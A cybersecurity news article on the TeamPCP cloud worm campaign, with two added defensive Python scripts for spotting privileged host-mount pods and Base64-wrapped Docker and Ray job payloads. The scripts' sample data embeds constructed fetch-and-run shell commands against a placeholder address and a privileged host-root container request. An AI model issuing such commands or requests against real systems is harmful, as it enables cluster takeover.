Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

The Dawn of a New Era in Cloud-Native Cybercrime: Unveiling TeamPCP's Exploits

A recently documented campaign is abusing misconfigured Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers in cloud-native environments to build malicious infrastructure for follow-on exploitation. The activity has been attributed to TeamPCP, a newly identified threat cluster whose operation covers the full lifecycle of scanning, exploitation, persistence, tunneling, data theft, and monetization, built specifically for modern cloud infrastructure.

  • Cybersecurity researchers have discovered a massive campaign that targets cloud-native environments to stand up malicious infrastructure.
  • The activity, described as "worm-driven," leverages exposed Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers.
  • TeamPCP, the attributed threat cluster, has been active since at least November 2025 and has 700 members in its Telegram channel.
  • The group's goals are to build a distributed proxy and scanning infrastructure, then compromise servers for data theft, ransomware deployment, extortion, and cryptocurrency mining.
  • TeamPCP functions as a cloud-native cybercrime platform, exploiting misconfigured Docker and Kubernetes APIs, Ray dashboards, Redis servers, and vulnerable React/Next.js applications.
  • The compromised infrastructure is reused for cryptocurrency mining, data hosting, proxy and C2 relays, and tunneling utilities.
  • proxy.sh is the key tool: it installs proxy, P2P, and tunneling utilities and delivers scanners that search the internet for vulnerable servers.
  • The other payloads are scanner.py (Docker API and Ray dashboard discovery), mine.sh (cryptocurrency mining), kube.py (Kubernetes cluster takeover), React.py (React2Shell exploitation), and pcpcat.py (automated container and job deployment on exposed Docker APIs and Ray dashboards).
  • TeamPCP primarily targets AWS and Microsoft Azure environments, focusing on infrastructure rather than specific industries.
  • The group blends infrastructure exploitation with data theft and extortion, using leaked data to fuel ransomware, fraud, and cybercrime reputation building.

    Cybersecurity researchers have discovered a "massive campaign" that systematically targets cloud-native environments to set up malicious infrastructure for follow-on exploitation. The activity, observed around December 25, 2025, and described as "worm-driven," leveraged exposed Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers, along with the recently disclosed React2Shell vulnerability (CVE-2025-55182, CVSS score: 10.0). The campaign has been attributed to a threat cluster known as TeamPCP (aka DeadCatx3, PCPcat, PersyPCP, and ShellForce).

    Little is known about the group's origins, but it has been active since at least November 2025. The first instance of Telegram activity was documented by Beelzebub on July 30, 2025. The TeamPCP Telegram channel currently has 700 members, and the group uses it to publish stolen data from victims in Canada, Serbia, South Korea, the U.A.E., and the U.S.

    According to Flare security researcher Assaf Morag, the operation's goals were twofold: building distributed proxy and scanning infrastructure at scale, and then compromising servers to exfiltrate data, deploy ransomware, conduct extortion, and mine cryptocurrency. This combination means TeamPCP functions as a cloud-native cybercrime platform, using misconfigured Docker APIs, Kubernetes APIs, Ray dashboards, Redis servers, and vulnerable React/Next.js applications as its primary infection pathways into modern cloud infrastructure, and data theft and extortion as the payoff.


    Beyond those primary objectives, the compromised infrastructure is reused for cryptocurrency mining, data hosting, proxy and command-and-control (C2) relays, and tunneling utilities. Each compromised host therefore both generates revenue and extends the scanning and relay network used to find the next victims, which is what makes the campaign self-propagating.

    One of the key tools employed by this group is "proxy.sh," which installs proxy, peer-to-peer (P2P), and tunneling utilities, as well as delivering various scanners to continuously search the internet for vulnerable and misconfigured servers. Notably, proxy.sh performs environment fingerprinting at execution time, checking whether it is running inside a Kubernetes cluster. If such an environment is detected, the script branches into a separate execution path and drops a cluster-specific secondary payload.

    Other payloads include scanner.py, which finds misconfigured Docker APIs and Ray dashboards by downloading Classless Inter-Domain Routing (CIDR) target lists from a GitHub account named "DeadCatx3" and can optionally launch a cryptocurrency miner ("mine.sh"). kube.py carries the Kubernetes-specific functionality: it harvests cluster credentials, enumerates resources such as pods and namespaces through the API, and then deploys a privileged pod on every node that mounts the host filesystem, which is equivalent to root on each node. React.py is designed to exploit the React2Shell flaw (CVE-2025-55182) to achieve remote command execution at scale.
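    From the defender's side, the kube.py deployment pattern is easy to audit for: a container that is privileged (or shares the host PID namespace) and mounts the node's root filesystem or another sensitive host path, repeated once per node. The script below flags such containers in a pod listing and groups hits by image so the one-pod-per-node fan-out stands out from a single misconfigured workload. This is an added example, not TeamPCP's code and not part of Flare's analysis; the pod listing, image and node names, and the 198.51.100.7 address are constructed.

```python
"""Audit a Kubernetes pod listing for the kube.py deployment pattern: a
privileged pod on every node that mounts the host filesystem.

Added example (not TeamPCP's code, not from Flare). SAMPLE_POD_LIST is
constructed in the shape of `kubectl get pods -A -o json` output; feed real
output on stdin instead, e.g. `kubectl get pods -A -o json | python3 audit.py`
(audit.py is a hypothetical file name)."""
import json
import os
import sys

# Host paths whose mount into a privileged container amounts to node takeover.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/var/run/docker.sock"}


def _pod(name, node, image, command, privileged, host_path=None, ns="kube-system"):
    """Build one pod object in kubectl JSON shape (sample-data helper)."""
    container = {
        "name": "main",
        "image": image,
        "command": command,
        "securityContext": {"privileged": privileged},
        "volumeMounts": [],
    }
    spec = {"nodeName": node, "containers": [container], "volumes": []}
    if host_path:
        spec["volumes"].append({"name": "host", "hostPath": {"path": host_path}})
        container["volumeMounts"].append({"name": "host", "mountPath": "/host"})
    return {"metadata": {"name": name, "namespace": ns}, "spec": spec}


# Constructed sample: one privileged, host-root-mounting pod fanned out to two
# nodes (the pattern to catch), a privileged pod without any host mount, and an
# ordinary workload. 198.51.100.7 is a documentation address.
_STAGE2 = "chroot /host sh -c 'curl -s http://198.51.100.7/p.sh | sh'"
SAMPLE_POD_LIST = json.dumps({"items": [
    _pod("sys-agent-n1", "node-1", "alpine:latest", ["sh", "-c", _STAGE2], True, "/"),
    _pod("sys-agent-n2", "node-2", "alpine:latest", ["sh", "-c", _STAGE2], True, "/"),
    _pod("cni-plugin-n1", "node-1", "registry.example/cni:1.0", ["/cni"], True),
    _pod("web-1", "node-2", "nginx:1.27", ["nginx"], False, ns="default"),
]})


def sensitive_volumes(spec):
    """Map volume name -> normalised host path for hostPath volumes on
    sensitive paths; other volumes are ignored."""
    out = {}
    for vol in spec.get("volumes", []):
        path = (vol.get("hostPath") or {}).get("path")
        if path and os.path.normpath(path) in SENSITIVE_HOST_PATHS:
            out[vol["name"]] = os.path.normpath(path)
    return out


def find_host_escape_pods(pod_list_json):
    """Return one finding per container that is privileged (or shares the host
    PID namespace) and mounts a sensitive host path."""
    findings = []
    for pod in json.loads(pod_list_json)["items"]:
        spec = pod["spec"]
        risky = sensitive_volumes(spec)
        if not risky:
            continue
        for c in spec.get("initContainers", []) + spec.get("containers", []):
            sc = c.get("securityContext") or {}
            elevated = bool(sc.get("privileged")) or bool(spec.get("hostPID"))
            hit = {m["name"] for m in c.get("volumeMounts", [])} & set(risky)
            if elevated and hit:
                findings.append({
                    "namespace": pod["metadata"]["namespace"],
                    "pod": pod["metadata"]["name"],
                    "node": spec.get("nodeName"),
                    "image": c.get("image"),
                    "host_paths": sorted(risky[v] for v in hit),
                })
    return findings


def fan_out(findings):
    """Group findings by (namespace, image) -> sorted node list: the same
    image flagged on many nodes is the kube.py fan-out, not a one-off."""
    groups = {}
    for f in findings:
        groups.setdefault((f["namespace"], f["image"]), set()).add(f["node"])
    return {key: sorted(nodes) for key, nodes in groups.items()}


if __name__ == "__main__":
    data = SAMPLE_POD_LIST if sys.stdin.isatty() else sys.stdin.read()
    hits = find_host_escape_pods(data)
    for f in hits:
        print(f"{f['namespace']}/{f['pod']} on {f['node']}: {f['image']} "
              f"mounts {f['host_paths']}")
    for (ns, image), nodes in fan_out(hits).items():
        if len(nodes) > 1:
            print(f"fan-out: {image} in {ns} on {len(nodes)} nodes {nodes}")
```

    The check deliberately treats hostPID the same as privileged, since a container in the host PID namespace with a root mount does not need the privileged flag to pivot onto the node. Legitimate privileged system pods (CNI plugins, node agents) normally mount specific paths such as /opt/cni or /var/lib/kubelet rather than /, which is why the audit keys on the mounted path rather than on the privileged flag alone.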

    pcpcat.py, meanwhile, aims to discover exposed Docker APIs and Ray dashboards across large IP address ranges and automatically deploy a malicious container or job that executes a Base64-encoded payload.
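    Both deployment paths pcpcat.py uses carry the real command Base64-wrapped, so a review of request bodies (from a reverse proxy in front of the Docker socket or the Ray dashboard, or from the daemon's own request logging) has to unwrap them to see what was run. The script below does that for a Docker `POST /containers/create` body and a Ray Jobs API `POST /api/jobs/` submission and flags the host-escape settings in the Docker request. This is an added example, not TeamPCP's code and not from Flare; both request bodies, the stage-2 command, and the 198.51.100.7 address are constructed.

```python
"""Unwrap and flag the deployment requests pcpcat.py is described as sending
to exposed services: a Docker `POST /containers/create` body and a Ray Jobs
API `POST /api/jobs/` submission, each carrying its real command Base64-wrapped.

Added example (not TeamPCP's code, not from Flare). Both request bodies, the
stage-2 command and the 198.51.100.7 address are constructed."""
import base64
import json
import re

# Host paths a bind-mount of which hands the container the node.
SENSITIVE_BIND_SOURCES = {"/", "/etc", "/root", "/var/run/docker.sock"}

# Constructed stage-2 command and its Base64 form, as a deployer would embed it.
STAGE2 = "curl -s http://198.51.100.7/proxy.sh | sh"
STAGE2_B64 = base64.b64encode(STAGE2.encode()).decode()

SAMPLE_DOCKER_CREATE = json.dumps({
    "Image": "alpine:latest",
    "Cmd": ["sh", "-c", f"echo {STAGE2_B64} | base64 -d | sh"],
    "HostConfig": {
        "Privileged": True,
        "Binds": ["/:/host"],
        "PidMode": "host",
        "NetworkMode": "host",
    },
})

SAMPLE_RAY_JOB = json.dumps({
    "entrypoint": ("python3 -c \"import base64,os;"
                   f"os.system(base64.b64decode('{STAGE2_B64}').decode())\""),
    "runtime_env": {},
})

# Runs of Base64 alphabet long enough to be a wrapped command, with padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_embedded_base64(text):
    """Return every Base64 token in `text` that decodes to printable text."""
    decoded = []
    for tok in B64_TOKEN.findall(text):
        try:
            plain = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # not Base64, or not text
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in plain):
            decoded.append(plain)
    return decoded


def _as_text(value):
    """Docker accepts Cmd/Entrypoint as a string or a list of strings."""
    if value is None:
        return ""
    return value if isinstance(value, str) else " ".join(value)


def analyze_docker_create(body_json):
    """Flag host-escape settings in a container-create body and unwrap
    Base64 in its command line."""
    body = json.loads(body_json)
    hc = body.get("HostConfig") or {}
    flags = []
    if hc.get("Privileged"):
        flags.append("privileged")
    for bind in hc.get("Binds") or []:
        src = bind.split(":")[0]
        if src in SENSITIVE_BIND_SOURCES:
            flags.append(f"host-bind:{src}")
    if hc.get("PidMode") == "host":
        flags.append("host-pid")
    if hc.get("NetworkMode") == "host":
        flags.append("host-network")
    cmdline = _as_text(body.get("Entrypoint")) + " " + _as_text(body.get("Cmd"))
    return {"image": body.get("Image"), "flags": flags,
            "decoded": decode_embedded_base64(cmdline)}


def analyze_ray_job(body_json):
    """Unwrap Base64 in a Ray job entrypoint; any submitted job runs as the
    dashboard's OS user, so the entrypoint itself is the payload."""
    body = json.loads(body_json)
    entrypoint = body.get("entrypoint", "")
    return {"entrypoint": entrypoint,
            "decoded": decode_embedded_base64(entrypoint)}


if __name__ == "__main__":
    print(analyze_docker_create(SAMPLE_DOCKER_CREATE))
    print(analyze_ray_job(SAMPLE_RAY_JOB))
```

    Note that the Ray case has no settings to flag: the Ray Jobs API executes any submitted entrypoint by design, so an unauthenticated dashboard is remote code execution on its own and the only meaningful control is not exposing it. The Docker case is different only in that the attacker also has to ask for the host mount and privileged mode, which is exactly what a daemon-side authorization plugin or an admission policy in front of the API should refuse.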


    A server at 67.217.57[.]240 tied to the operation runs Sliver, an open-source C2 framework that threat actors routinely abuse for post-exploitation.

    Data from cybersecurity company Flare indicates that TeamPCP primarily targets Amazon Web Services (AWS) and Microsoft Azure environments. The attacks are deemed opportunistic in nature, mainly focusing on infrastructure that supports their goals rather than targeting specific industries. Consequently, organizations running such infrastructure become "collateral victims" in the process.


    The PCPcat campaign exemplifies a full lifecycle of scanning, exploitation, persistence, tunneling, data theft, and monetization built specifically for modern cloud infrastructure. What makes TeamPCP dangerous is not technical novelty but operational integration and scale: most of its exploits and malware are built on well-known vulnerabilities and lightly modified open-source tools.

    Furthermore, this group blends infrastructure exploitation with data theft and extortion. Leaked CV databases, identity records, and corporate data are published through ShellForce to fuel ransomware, fraud, and cybercrime reputation building. This hybrid model grants the group multiple revenue streams and resilience against takedowns.

    Related Information:
  • https://www.ethicalhackingnews.com/articles/The-Dawn-of-a-New-Era-in-Cloud-Native-Cybercrime-Unveiling-TeamPCPs-Exploits-ehn.shtml

  • https://thehackernews.com/2026/02/teampcp-worm-exploits-cloud.html

  • https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware/

  • https://nvd.nist.gov/vuln/detail/CVE-2025-29927

  • https://www.cvedetails.com/cve/CVE-2025-29927/

  • https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • https://www.cvedetails.com/cve/CVE-2025-55182/

  • https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/

  • https://cybersecuritynews.com/new-pcpcat-exploiting-react2shell-vulnerability/

  • https://gbhackers.com/pcpcat-malware/

  • https://en.wikipedia.org/wiki/Advanced_persistent_threat


  • Published: Mon Feb 9 04:08:01 2026 by llama3.2 3B Q4_K_M

    © Ethical Hacking News . All rights reserved.
